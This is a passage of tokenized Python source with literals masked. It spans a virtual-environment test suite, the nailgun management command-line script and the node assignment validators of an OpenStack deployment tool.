<NUM_LIT:0> ] . ip_address , stor_net ) <EOL> slave_eth3 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert len ( slave_eth3 . addresses ) == <NUM_LIT:1> <EOL> assert_ip_in_net ( slave_eth3 . addresses [ <NUM_LIT:0> ] . ip_address , mng_net ) <EOL> slave_eth4 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert len ( slave_eth4 . addresses ) == <NUM_LIT:1> <EOL> assert_ip_in_net ( slave_eth4 . addresses [ <NUM_LIT:0> ] . ip_address , priv_net ) <EOL> def test_db ( self ) : <EOL> assert len ( self . env . group_set . all ( ) ) == <NUM_LIT:1> <EOL> group = self . env . get_group ( name = '<STR_LIT>' ) <EOL> assert group <EOL> assert len ( self . env . addresspool_set . all ( ) ) == <NUM_LIT:5> <EOL> get_ap = self . env . get_address_pool <EOL> assert get_ap ( name = '<STR_LIT>' ) <EOL> assert get_ap ( name = '<STR_LIT>' ) . tag == <NUM_LIT:0> <EOL> assert get_ap ( name = '<STR_LIT>' ) <EOL> assert get_ap ( name = '<STR_LIT>' ) . tag == <NUM_LIT:0> <EOL> assert get_ap ( name = '<STR_LIT>' ) <EOL> assert get_ap ( name = '<STR_LIT>' ) . tag == <NUM_LIT> <EOL> assert get_ap ( name = '<STR_LIT>' ) <EOL> assert get_ap ( name = '<STR_LIT>' ) . tag == <NUM_LIT> <EOL> assert get_ap ( name = '<STR_LIT>' ) <EOL> assert get_ap ( name = '<STR_LIT>' ) . tag == <NUM_LIT> <EOL> get_l2nd = group . get_l2_network_device <EOL> assert get_l2nd ( name = '<STR_LIT>' ) <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . forward . mode == '<STR_LIT>' <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . dhcp is False <EOL> assert get_l2nd ( name = '<STR_LIT>' ) <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . forward . mode == '<STR_LIT>' <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . dhcp is False <EOL> assert get_l2nd ( name = '<STR_LIT>' ) <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . forward . mode is None <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . dhcp is False <EOL> assert get_l2nd ( name = '<STR_LIT>' ) <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . forward . mode is None <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . dhcp is False <EOL> assert get_l2nd ( name = '<STR_LIT>' ) <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . forward . mode is None <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . dhcp is False <EOL> assert len ( self . env . get_nodes ( ) ) == <NUM_LIT:3> <EOL> admin_node = self . env . get_node ( name = '<STR_LIT>' ) <EOL> assert admin_node . role == '<STR_LIT>' <EOL> assert admin_node . vcpu == <NUM_LIT:2> <EOL> assert admin_node . memory == <NUM_LIT> <EOL> assert admin_node . hypervisor == '<STR_LIT:test>' <EOL> assert admin_node . architecture == '<STR_LIT>' <EOL> assert admin_node . boot == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> adm_sys_vol = admin_node . get_volume ( name = '<STR_LIT>' ) <EOL> assert adm_sys_vol . capacity == <NUM_LIT:10> <EOL> assert adm_sys_vol . format == '<STR_LIT>' <EOL> adm_sys_disk = admin_node . diskdevice_set . get ( volume = adm_sys_vol ) <EOL> assert adm_sys_disk . device == '<STR_LIT>' <EOL> assert adm_sys_disk . bus == '<STR_LIT>' <EOL> assert adm_sys_disk . target_dev == '<STR_LIT>' <EOL> adm_iso_vol = admin_node . get_volume ( name = '<STR_LIT>' ) <EOL> assert adm_iso_vol . capacity is None <EOL> assert adm_iso_vol . source_image == '<STR_LIT>' <EOL> assert adm_iso_vol . format == '<STR_LIT>' <EOL> adm_iso_disk = admin_node . diskdevice_set . get ( volume = adm_iso_vol ) <EOL> assert adm_iso_disk . device == '<STR_LIT>' <EOL> assert adm_iso_disk . bus == '<STR_LIT>' <EOL> assert adm_iso_disk . target_dev == '<STR_LIT>' <EOL> adm_eth0 = admin_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert adm_eth0 . label == '<STR_LIT>' <EOL> assert adm_eth0 . model == '<STR_LIT>' <EOL> assert adm_eth0 . l2_network_device . name == '<STR_LIT>' <EOL> adm_nc = admin_node . networkconfig_set . get ( label = '<STR_LIT>' ) <EOL> assert adm_nc . label == '<STR_LIT>' <EOL> assert adm_nc . networks == [ '<STR_LIT>' ] <EOL> assert adm_nc . parents == [ ] <EOL> assert adm_nc . aggregation is None <EOL> for slave_name in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> slave_node = self . env . get_node ( name = slave_name ) <EOL> assert slave_node . role == '<STR_LIT>' <EOL> assert slave_node . vcpu == <NUM_LIT:2> <EOL> assert slave_node . memory == <NUM_LIT> <EOL> assert slave_node . hypervisor == '<STR_LIT:test>' <EOL> assert slave_node . architecture == '<STR_LIT>' <EOL> assert slave_node . boot == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> slave_sys_vol = slave_node . get_volume ( name = '<STR_LIT>' ) <EOL> assert slave_sys_vol <EOL> assert slave_sys_vol . capacity == <NUM_LIT:10> <EOL> assert slave_sys_vol . format == '<STR_LIT>' <EOL> slave_sys_disk = slave_node . diskdevice_set . get ( <EOL> volume = slave_sys_vol ) <EOL> assert slave_sys_disk . device == '<STR_LIT>' <EOL> assert slave_sys_disk . bus == '<STR_LIT>' <EOL> assert slave_sys_disk . target_dev == '<STR_LIT>' <EOL> slave_cinder_vol = slave_node . get_volume ( name = '<STR_LIT>' ) <EOL> assert slave_cinder_vol <EOL> assert slave_cinder_vol . capacity == <NUM_LIT:10> <EOL> assert slave_cinder_vol . format == '<STR_LIT>' <EOL> slave_cinder_disk = slave_node . diskdevice_set . get ( <EOL> volume = slave_cinder_vol ) <EOL> assert slave_cinder_disk . device == '<STR_LIT>' <EOL> assert slave_cinder_disk . bus == '<STR_LIT>' <EOL> assert slave_cinder_disk . target_dev == '<STR_LIT>' <EOL> slave_swift_vol = slave_node . get_volume ( name = '<STR_LIT>' ) <EOL> assert slave_swift_vol <EOL> assert slave_swift_vol . capacity == <NUM_LIT:10> <EOL> assert slave_swift_vol . format == '<STR_LIT>' <EOL> slave_swift_disk = slave_node . diskdevice_set . get ( <EOL> volume = slave_swift_vol ) <EOL> assert slave_swift_disk . device == '<STR_LIT>' <EOL> assert slave_swift_disk . bus == '<STR_LIT>' <EOL> assert slave_swift_disk . target_dev == '<STR_LIT>' <EOL> slave_eth0 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth0 <EOL> assert slave_eth0 . label == '<STR_LIT>' <EOL> assert slave_eth0 . model == '<STR_LIT>' <EOL> assert slave_eth0 . l2_network_device . name == '<STR_LIT>' <EOL> slave_eth1 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth1 <EOL> assert slave_eth1 . label == '<STR_LIT>' <EOL> assert slave_eth1 . model == '<STR_LIT>' <EOL> assert slave_eth1 . l2_network_device . name == '<STR_LIT>' <EOL> slave_eth2 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth2 <EOL> assert slave_eth2 . label == '<STR_LIT>' <EOL> assert slave_eth2 . model == '<STR_LIT>' <EOL> assert slave_eth2 . l2_network_device . name == '<STR_LIT>' <EOL> slave_eth3 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth3 <EOL> assert slave_eth3 . label == '<STR_LIT>' <EOL> assert slave_eth3 . model == '<STR_LIT>' <EOL> assert slave_eth3 . l2_network_device . name == '<STR_LIT>' <EOL> slave_eth4 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth4 <EOL> assert slave_eth4 . label == '<STR_LIT>' <EOL> assert slave_eth4 . model == '<STR_LIT>' <EOL> assert slave_eth4 . l2_network_device . name == '<STR_LIT>' <EOL> slave_eth0_nc = slave_node . networkconfig_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth0_nc <EOL> assert slave_eth0_nc . label == '<STR_LIT>' <EOL> assert slave_eth0_nc . networks == [ '<STR_LIT>' ] <EOL> assert slave_eth0_nc . parents == [ ] <EOL> assert slave_eth0_nc . aggregation is None <EOL> slave_eth1_nc = slave_node . networkconfig_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth1_nc <EOL> assert slave_eth1_nc . label == '<STR_LIT>' <EOL> assert slave_eth1_nc . networks == [ '<STR_LIT>' ] <EOL> assert slave_eth1_nc . parents == [ ] <EOL> assert slave_eth1_nc . aggregation is None <EOL> slave_eth2_nc = slave_node . networkconfig_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth2_nc <EOL> assert slave_eth2_nc . label == '<STR_LIT>' <EOL> assert slave_eth2_nc . networks == [ '<STR_LIT>' ] <EOL> assert slave_eth2_nc . parents == [ ] <EOL> assert slave_eth2_nc . aggregation is None <EOL> slave_eth3_nc = slave_node . networkconfig_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth3_nc <EOL> assert slave_eth3_nc . label == '<STR_LIT>' <EOL> assert slave_eth3_nc . networks == [ '<STR_LIT>' ] <EOL> assert slave_eth3_nc . parents == [ ] <EOL> assert slave_eth3_nc . aggregation is None <EOL> slave_eth4_nc = slave_node . networkconfig_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth4_nc <EOL> assert slave_eth4_nc . label == '<STR_LIT>' <EOL> assert slave_eth4_nc . networks == [ '<STR_LIT>' ] <EOL> assert slave_eth4_nc . parents == [ ] <EOL> assert slave_eth4_nc . aggregation is None <EOL> def test_life_cycle ( self ) : <EOL> assert len ( self . d . get_allocated_networks ( ) ) == <NUM_LIT:0> <EOL> assert len ( self . d . conn . listDefinedNetworks ( ) ) == <NUM_LIT:0> <EOL> assert len ( self . d . conn . listDefinedDomains ( ) ) == <NUM_LIT:0> <EOL> self . env . define ( ) <EOL> nets = map ( str , self . d . get_allocated_networks ( ) ) <EOL> assert sorted ( nets ) == [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> assert sorted ( self . d . conn . listDefinedNetworks ( ) ) == [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> assert sorted ( self . d . conn . listDefinedDomains ( ) ) == [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . env . start ( ) <EOL> networks = self . d . conn . listAllNetworks ( ) <EOL> assert len ( networks ) == <NUM_LIT:5> <EOL> for network in networks : <EOL> assert network . isActive ( ) <EOL> domains = self . d . conn . listAllDomains ( ) <EOL> assert len ( domains ) == <NUM_LIT:3> <EOL> for domain in domains : <EOL> assert domain . isActive ( ) <EOL> self . env . destroy ( ) <EOL> networks = self . d . conn . listAllNetworks ( ) <EOL> assert len ( networks ) == <NUM_LIT:5> <EOL> for network in networks : <EOL> assert network . isActive ( ) <EOL> domains = self . d . conn . listAllDomains ( ) <EOL> assert len ( domains ) == <NUM_LIT:3> <EOL> for domain in domains : <EOL> assert not domain . isActive ( ) <EOL> self . env . erase ( ) <EOL> assert len ( self . d . get_allocated_networks ( ) ) == <NUM_LIT:0> <EOL> assert len ( self . d . conn . listAllNetworks ( ) ) == <NUM_LIT:0> <EOL> assert len ( self . d . conn . listAllDomains ( ) ) == <NUM_LIT:0> </s>
<s> import __main__ <EOL> import argparse <EOL> import code <EOL> import os <EOL> import sys <EOL> def add_config_parameter ( parser ) : <EOL> parser . add_argument ( <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , type = str , <EOL> help = '<STR_LIT>' , default = None <EOL> ) <EOL> def load_run_parsers ( subparsers ) : <EOL> run_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT:port>' , action = '<STR_LIT:store>' , type = str , <EOL> help = '<STR_LIT>' , default = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT:address>' , action = '<STR_LIT:store>' , type = str , <EOL> help = '<STR_LIT>' , default = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> add_config_parameter ( run_parser ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store>' , type = int , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store>' , type = int , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store>' , type = str , <EOL> help = '<STR_LIT>' , <EOL> choices = [ '<STR_LIT:none>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) <EOL> def load_db_parsers ( subparsers ) : <EOL> subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> loaddata_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> loaddata_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store>' , help = '<STR_LIT>' <EOL> ) <EOL> dumpdata_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> dumpdata_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store>' , help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> generate_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> generate_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , type = int , <EOL> help = '<STR_LIT>' , required = True <EOL> ) <EOL> generate_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , type = int , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> generate_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , type = int , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> generate_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> type = int , default = <NUM_LIT:1> , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> def load_alembic_parsers ( migrate_parser ) : <EOL> alembic_parser = migrate_parser . add_subparsers ( <EOL> dest = "<STR_LIT>" , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> for name in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> parser = alembic_parser . add_parser ( name ) <EOL> for name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> parser = alembic_parser . add_parser ( name ) <EOL> parser . add_argument ( '<STR_LIT>' , type = int ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> parser . add_argument ( '<STR_LIT>' , nargs = '<STR_LIT:?>' ) <EOL> parser = alembic_parser . add_parser ( '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> parser = alembic_parser . add_parser ( '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> def load_db_migrate_parsers ( subparsers ) : <EOL> migrate_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> load_alembic_parsers ( migrate_parser ) <EOL> def load_dbshell_parsers ( subparsers ) : <EOL> dbshell_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> add_config_parameter ( dbshell_parser ) <EOL> def load_test_parsers ( subparsers ) : <EOL> subparsers . add_parser ( <EOL> '<STR_LIT:test>' , help = '<STR_LIT>' <EOL> ) <EOL> def load_shell_parsers ( subparsers ) : <EOL> shell_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> add_config_parameter ( shell_parser ) <EOL> def load_settings_parsers ( subparsers ) : <EOL> subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> def load_extensions_parsers ( subparsers ) : <EOL> extensions_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> load_alembic_parsers ( extensions_parser ) <EOL> def action_dumpdata ( params ) : <EOL> import logging <EOL> logging . disable ( logging . WARNING ) <EOL> from nailgun . db . sqlalchemy import fixman <EOL> fixman . dump_fixture ( params . model ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> def action_generate_nodes_fixture ( params ) : <EOL> from oslo_serialization import jsonutils <EOL> from nailgun . logger import logger <EOL> from nailgun . utils import fake_generator <EOL> logger . info ( '<STR_LIT>' ) <EOL> total_nodes_count = params . total_nodes <EOL> fixtures_dir = os . path . join ( os . path . dirname ( os . path . abspath ( __file__ ) ) , <EOL> '<STR_LIT>' ) <EOL> file_path = os . path . join ( <EOL> fixtures_dir , <EOL> '<STR_LIT>' . format ( total_nodes_count ) <EOL> ) <EOL> generator = fake_generator . FakeNodesGenerator ( ) <EOL> res = generator . generate_fake_nodes ( <EOL> total_nodes_count , error_nodes_count = params . error_nodes , <EOL> offline_nodes_count = params . offline_nodes , <EOL> min_ifaces_num = params . min_ifaces_num ) <EOL> with open ( file_path , '<STR_LIT:w>' ) as file_to_write : <EOL> jsonutils . dump ( res , file_to_write , indent = <NUM_LIT:4> ) <EOL> logger . info ( '<STR_LIT>' . format ( file_path ) ) <EOL> def action_loaddata ( params ) : <EOL> from nailgun . db . sqlalchemy import fixman <EOL> from nailgun . logger import logger <EOL> logger . info ( "<STR_LIT>" ) <EOL> with open ( params . fixture , "<STR_LIT:r>" ) as fileobj : <EOL> fixman . upload_fixture ( fileobj ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def action_loadfakedeploymenttasks ( params ) : <EOL> from nailgun . db . sqlalchemy import fixman <EOL> from nailgun . logger import logger <EOL> logger . info ( "<STR_LIT>" ) <EOL> fixman . load_fake_deployment_tasks ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def action_loaddefault ( params ) : <EOL> from nailgun . db . sqlalchemy import fixman <EOL> from nailgun . logger import logger <EOL> logger . info ( "<STR_LIT>" ) <EOL> fixman . upload_fixtures ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> fixman . load_fake_deployment_tasks ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def action_syncdb ( params ) : <EOL> from nailgun . db import syncdb <EOL> from nailgun . logger import logger <EOL> logger . info ( "<STR_LIT>" ) <EOL> syncdb ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def action_dropdb ( params ) : <EOL> from nailgun . db import dropdb <EOL> from nailgun . logger import logger <EOL> logger . info ( "<STR_LIT>" ) <EOL> dropdb ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def action_migrate ( params ) : <EOL> from nailgun . db . migration import action_migrate_alembic_core <EOL> action_migrate_alembic_core ( params ) <EOL> def action_extensions ( params ) : <EOL> from nailgun . logger import logger <EOL> from nailgun . db . migration import action_migrate_alembic_extension <EOL> from nailgun . extensions import get_all_extensions <EOL> for extension in get_all_extensions ( ) : <EOL> if extension . alembic_migrations_path ( ) : <EOL> logger . info ( '<STR_LIT>' . format ( <EOL> extension . full_name ( ) ) ) <EOL> action_migrate_alembic_extension ( params , extension = extension ) <EOL> else : <EOL> logger . info ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( extension . full_name ( ) ) ) <EOL> def action_test ( params ) : <EOL> from nailgun . logger import logger <EOL> from nailgun . unit_test import TestRunner <EOL> logger . info ( "<STR_LIT>" ) <EOL> TestRunner . run ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def action_dbshell ( params ) : <EOL> from nailgun . settings import settings <EOL> if params . config_file : <EOL> settings . update_from_file ( params . config_file ) <EOL> args = [ '<STR_LIT>' ] <EOL> env = { } <EOL> if settings . DATABASE [ '<STR_LIT>' ] : <EOL> env [ '<STR_LIT>' ] = settings . DATABASE [ '<STR_LIT>' ] <EOL> if settings . DATABASE [ '<STR_LIT:user>' ] : <EOL> args += [ "<STR_LIT>" , settings . DATABASE [ '<STR_LIT:user>' ] ] <EOL> if settings . DATABASE [ '<STR_LIT:host>' ] : <EOL> args . extend ( [ "<STR_LIT>" , settings . DATABASE [ '<STR_LIT:host>' ] ] ) <EOL> if settings . DATABASE [ '<STR_LIT:port>' ] : <EOL> args . extend ( [ "<STR_LIT>" , str ( settings . DATABASE [ '<STR_LIT:port>' ] ) ] ) <EOL> args += [ settings . DATABASE [ '<STR_LIT:name>' ] ] <EOL> if os . name == '<STR_LIT>' : <EOL> sys . exit ( os . system ( "<STR_LIT:U+0020>" . join ( args ) ) ) <EOL> else : <EOL> os . execvpe ( '<STR_LIT>' , args , env ) <EOL> def action_dump_settings ( params ) : <EOL> from nailgun . settings import settings <EOL> sys . stdout . write ( settings . dump ( ) ) <EOL> def action_shell ( params ) : <EOL> from nailgun . db import db <EOL> from nailgun . settings import settings <EOL> if params . config_file : <EOL> settings . update_from_file ( params . config_file ) <EOL> try : <EOL> from IPython import embed <EOL> embed ( ) <EOL> except ImportError : <EOL> code . interact ( local = { '<STR_LIT>' : db , '<STR_LIT>' : settings } ) <EOL> def action_run ( params ) : <EOL> from nailgun . settings import settings <EOL> settings . update ( { <EOL> '<STR_LIT>' : int ( params . port ) , <EOL> '<STR_LIT>' : params . address , <EOL> } ) <EOL> for attr in [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> param = getattr ( params , attr . lower ( ) ) <EOL> if param is not None : <EOL> settings . update ( { attr : param } ) <EOL> if params . authentication_method : <EOL> auth_method = params . authentication_method <EOL> settings . AUTH . update ( { '<STR_LIT>' : auth_method } ) <EOL> if params . config_file : <EOL> settings . update_from_file ( params . config_file ) <EOL> from nailgun . app import appstart <EOL> appstart ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> parser = argparse . ArgumentParser ( ) <EOL> subparsers = parser . add_subparsers ( <EOL> dest = "<STR_LIT:action>" , help = '<STR_LIT>' <EOL> ) <EOL> load_run_parsers ( subparsers ) <EOL> load_db_parsers ( subparsers ) <EOL> load_db_migrate_parsers ( subparsers ) <EOL> load_dbshell_parsers ( subparsers ) <EOL> load_test_parsers ( subparsers ) <EOL> load_shell_parsers ( subparsers ) <EOL> load_settings_parsers ( subparsers ) <EOL> load_extensions_parsers ( subparsers ) <EOL> params , other_params = parser . parse_known_args ( ) <EOL> sys . argv . pop ( <NUM_LIT:1> ) <EOL> action = getattr ( <EOL> __main__ , <EOL> "<STR_LIT>" . format ( params . action ) <EOL> ) <EOL> action ( params ) if action else parser . print_help ( ) </s>
<s> from operator import attrgetter <EOL> import sqlalchemy as sa <EOL> from nailgun . api . v1 . validators . base import BasicValidator <EOL> from nailgun . api . v1 . validators . json_schema . assignment import assignment_format_schema <EOL> from nailgun . api . v1 . validators . json_schema . assignment import unassignment_format_schema <EOL> from nailgun . db import db <EOL> from nailgun . db . sqlalchemy . models import Node <EOL> from nailgun import errors <EOL> from nailgun . expression import Expression <EOL> from nailgun import objects <EOL> class AssignmentValidator ( BasicValidator ) : <EOL> predicate = None <EOL> done_error_msg_template = None <EOL> @ staticmethod <EOL> def check_all_nodes ( nodes , node_ids ) : <EOL> not_found_node_ids = set ( node_ids ) - set ( n . id for n in nodes ) <EOL> if not_found_node_ids : <EOL> raise errors . InvalidData ( <EOL> u"<STR_LIT>" <EOL> . format ( <EOL> "<STR_LIT:U+002C>" . join ( map ( str , not_found_node_ids ) ) <EOL> ) , log_message = True <EOL> ) <EOL> @ classmethod <EOL> def check_if_already_done ( cls , nodes ) : <EOL> already_done_nodes = filter ( cls . predicate , nodes ) <EOL> if any ( already_done_nodes ) : <EOL> raise errors . InvalidData ( <EOL> cls . done_error_msg_template <EOL> . format ( "<STR_LIT:U+002C>" . join ( map ( str , already_done_nodes ) ) ) , <EOL> log_message = True <EOL> ) <EOL> @ classmethod <EOL> def check_unique_hostnames ( cls , nodes , cluster_id ) : <EOL> hostnames = [ node . hostname for node in nodes ] <EOL> conflicting_hostnames = [ <EOL> x [ <NUM_LIT:0> ] for x in <EOL> db . query ( <EOL> Node . hostname ) . filter ( sa . and_ ( <EOL> Node . hostname . in_ ( hostnames ) , <EOL> Node . cluster_id == cluster_id , <EOL> ) <EOL> ) . all ( ) <EOL> ] <EOL> if conflicting_hostnames : <EOL> raise errors . AlreadyExists ( <EOL> "<STR_LIT>" <EOL> . format ( "<STR_LIT:U+002C>" . join ( conflicting_hostnames ) , cluster_id ) <EOL> ) <EOL> class NodeAssignmentValidator ( AssignmentValidator ) : <EOL> predicate = attrgetter ( '<STR_LIT>' ) <EOL> done_error_msg_template = "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> @ classmethod <EOL> def validate_collection_update ( cls , data , cluster_id = None ) : <EOL> data = cls . validate_json ( data ) <EOL> cls . validate_schema ( data , assignment_format_schema ) <EOL> dict_data = dict ( ( d [ "<STR_LIT:id>" ] , d [ "<STR_LIT>" ] ) for d in data ) <EOL> received_node_ids = dict_data . keys ( ) <EOL> nodes = db . query ( Node ) . filter ( Node . id . in_ ( received_node_ids ) ) <EOL> cls . check_all_nodes ( nodes , received_node_ids ) <EOL> cls . check_if_already_done ( nodes ) <EOL> cluster = objects . Cluster . get_by_uid ( <EOL> cluster_id , fail_if_not_found = True <EOL> ) <EOL> cls . check_unique_hostnames ( nodes , cluster_id ) <EOL> for node_id in received_node_ids : <EOL> cls . validate_roles ( <EOL> cluster , <EOL> dict_data [ node_id ] <EOL> ) <EOL> return dict_data <EOL> @ classmethod <EOL> def validate_roles ( cls , cluster , roles ) : <EOL> available_roles = objects . Cluster . get_roles ( cluster ) <EOL> roles = set ( roles ) <EOL> not_valid_roles = roles - set ( available_roles ) <EOL> if not_valid_roles : <EOL> raise errors . InvalidData ( <EOL> u"<STR_LIT>" <EOL> . format ( u"<STR_LIT:U+002CU+0020>" . join ( not_valid_roles ) , cluster . id ) , <EOL> log_message = True <EOL> ) <EOL> cls . check_roles_for_conflicts ( roles , available_roles ) <EOL> cls . check_roles_requirement ( <EOL> roles , <EOL> available_roles , <EOL> { <EOL> '<STR_LIT>' : cluster . attributes . editable , <EOL> '<STR_LIT>' : cluster , <EOL> } ) <EOL> @ classmethod <EOL> def check_roles_for_conflicts ( cls , roles , roles_metadata ) : <EOL> all_roles = set ( roles_metadata . keys ( ) ) <EOL> for role in roles : <EOL> if "<STR_LIT>" in roles_metadata [ role ] : <EOL> other_roles = roles - set ( [ role ] ) <EOL> conflicting_roles = roles_metadata [ role ] [ "<STR_LIT>" ] <EOL> if conflicting_roles == "<STR_LIT:*>" : <EOL> conflicting_roles = all_roles - set ( [ role ] ) <EOL> else : <EOL> conflicting_roles = set ( conflicting_roles ) <EOL> conflicting_roles &= other_roles <EOL> if conflicting_roles : <EOL> raise errors . InvalidData ( <EOL> u'<STR_LIT>' <EOL> . format ( role , "<STR_LIT:U+002CU+0020>" . join ( conflicting_roles ) ) , <EOL> log_message = True <EOL> ) <EOL> @ classmethod <EOL> def check_roles_requirement ( cls , roles , roles_metadata , models ) : <EOL> for role in roles : <EOL> if "<STR_LIT>" in roles_metadata [ role ] : <EOL> depends = roles_metadata [ role ] [ '<STR_LIT>' ] <EOL> for condition in depends : <EOL> expression = condition [ '<STR_LIT>' ] <EOL> if not Expression ( expression , models ) . evaluate ( ) : <EOL> raise errors . InvalidData ( condition [ '<STR_LIT>' ] ) <EOL> class NodeUnassignmentValidator ( AssignmentValidator ) : <EOL> done_error_msg_template = "<STR_LIT>" "<STR_LIT>" <EOL> @ staticmethod <EOL> def predicate ( node ) : <EOL> return not node . cluster or node . pending_deletion <EOL> @ classmethod <EOL> def validate_collection_update ( cls , data , cluster_id = None ) : <EOL> list_data = cls . validate_json ( data ) <EOL> cls . validate_schema ( list_data , unassignment_format_schema ) <EOL> node_ids_set = set ( n [ '<STR_LIT:id>' ] for n in list_data ) <EOL> nodes = db . query ( Node ) . filter ( Node . id . in_ ( node_ids_set ) ) <EOL> node_id_cluster_map = dict ( <EOL> ( n . id , n . cluster_id ) for n in <EOL> db . 